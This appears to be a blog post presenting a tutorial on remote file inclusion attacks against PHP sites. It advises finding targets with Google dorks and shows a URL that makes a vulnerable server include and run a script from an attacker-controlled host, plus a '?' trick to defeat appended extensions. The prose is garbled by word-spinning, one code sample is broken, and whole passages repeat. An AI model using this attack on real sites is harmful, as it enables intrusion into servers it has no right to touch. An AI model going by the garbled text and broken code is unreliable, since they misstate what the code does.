Remote file inclusion (RFI) tutorial
RFI is an anomalous form of web fierceness where the invader can inject their own scripts and kill it approaching the web server. I subsequent to to call RFI the gaining of unpredictable and uncontrollable code.
Im pardon many of you who are reading this have attempted RFI and probably are saw that its a easily reached method of ferociousness. But sick bet that not many know what occurs subsequent to the scene, how it works, and why it works. Today in poor health intensify that.
Im pardon many of you who are reading this have attempted RFI and probably are saw that its a easily reached method of ferociousness. But sick bet that not many know what occurs subsequent to the scene, how it works, and why it works. Today in poor health intensify that.
First of all we have to find the website that gets his pages using the PHP include() function and vulnerable to RFI (Remote File Inclusion). The best technique is to find websites using Google Dorks. Google dorks are simply the queries that are used to identify the specific search results.
I have already listed a lot off Google Dorks in my previous post. You can Download the list of Dorks for RFI from here.
I have already listed a lot off Google Dorks in my previous post. You can Download the list of Dorks for RFI from here.
So how does RFI take steps?
To know how RFI works, you compulsion to have a in try of fact basic pure family of PHP. Its not in intention of fact hard to resign yourself to, but for those who realize not getting merger of PHP at all, in poor health be explaining the code.
Lets statement you have a site that is vulnerable to RFI, and its displaying the main page of the site as index.html. This is how the PHP could be scripted coarsely the vulnerable site.
PHP Code:
<?php
$file =$_GET['index']; //The page we hope to display
have an effect on in front($file);
?>
Code Examination:
Ok for those who dont know PHP, tolerate me manage by the code, for those who know it, disquiet uphill right along :)
$ is used to believe to be a adaptable and later you find the child support for it a value considering the = sign. Then its using the GET parameter to fetch the index.html. Then lastly, the ornament($file) straightforwardly tells the server to adjoin the changeable $file in this area the order of the page around which is coded. So if you put this PHP code upon the tummy page of the site, it will insert the index.html and thats why you can see the index of the site.
The URL of the site looking along with this:
http://www.site.com/index.php?page=index.html
Well knowing this, an attacker can manipulation the site using RFI once so:
http://www.site.com/index.php?page=http://www.attackersserver.com/my_evil_script.txt?
Before the whole, take on me interpret what happens upon the coding side.
PHP Code:
<?php
$file ="http://www.attackersserver.com/my_evil_script.txt?"; //$_GET['index'];
include($file); //$file is the script the attacker is including.
?>
As you can see, our regulating $file is no longer fetching the index.html, its including the script the invader has included from a detached server, suitably the reveal. Why does this be in? handily because of the include() do something that lets you partner files remotely.
As you can heavens the attacker has included a .txt file and not .php. Well why is that? The defense for this is because if the invader would have put .php and had PHP installed, the script will slay upon his server and not the targets.
Also, you noticed that we added a ?, the gloss we did this is because it removes anything that could society the include() function.
Take this code for example:
PHP Code:
<?php
$file =$_GET['index'];
include($file .".php");
?>
As you can see, there's anew just the modifiable $file in it, and that could late buildup an shape. The above script adds .php to any file that's mammal included. So if we included http://www.attackersserver.com/my_evil_script.txt without the ?, we are in reality going to see http://www.attackersserver.com/my_evil_script.txt.php because of what's inside of the add include() skirmish, which is BAD. So in order to make unconditional nothing is inside the include() take movement, we be credited behind the ?
To know how RFI works, you compulsion to have a in try of fact basic pure family of PHP. Its not in intention of fact hard to resign yourself to, but for those who realize not getting merger of PHP at all, in poor health be explaining the code.
Lets statement you have a site that is vulnerable to RFI, and its displaying the main page of the site as index.html. This is how the PHP could be scripted coarsely the vulnerable site.
PHP Code:
<?php
$file =$_GET['index']; //The page we hope to display
have an effect on in front($file);
?>
Code Examination:
Ok for those who dont know PHP, tolerate me manage by the code, for those who know it, disquiet uphill right along :)
$ is used to believe to be a adaptable and later you find the child support for it a value considering the = sign. Then its using the GET parameter to fetch the index.html. Then lastly, the ornament($file) straightforwardly tells the server to adjoin the changeable $file in this area the order of the page around which is coded. So if you put this PHP code upon the tummy page of the site, it will insert the index.html and thats why you can see the index of the site.
The URL of the site looking along with this:
http://www.site.com/index.php?page=index.html
Well knowing this, an attacker can manipulation the site using RFI once so:
http://www.site.com/index.php?page=http://www.attackersserver.com/my_evil_script.txt?
Before the whole, take on me interpret what happens upon the coding side.
PHP Code:
<?php
$file ="http://www.attackersserver.com/my_evil_script.txt?"; //$_GET['index'];
include($file); //$file is the script the attacker is including.
?>
As you can see, our regulating $file is no longer fetching the index.html, its including the script the invader has included from a detached server, suitably the reveal. Why does this be in? handily because of the include() do something that lets you partner files remotely.
As you can heavens the attacker has included a .txt file and not .php. Well why is that? The defense for this is because if the invader would have put .php and had PHP installed, the script will slay upon his server and not the targets.
Also, you noticed that we added a ?, the gloss we did this is because it removes anything that could society the include() function.
Take this code for example:
PHP Code:
<?php
$file =$_GET['index'];
include($file .".php");
?>
As you can see, there's anew just the modifiable $file in it, and that could late buildup an shape. The above script adds .php to any file that's mammal included. So if we included http://www.attackersserver.com/my_evil_script.txt without the ?, we are in reality going to see http://www.attackersserver.com/my_evil_script.txt.php because of what's inside of the add include() skirmish, which is BAD. So in order to make unconditional nothing is inside the include() take movement, we be credited behind the ?
No comments:
Post a Comment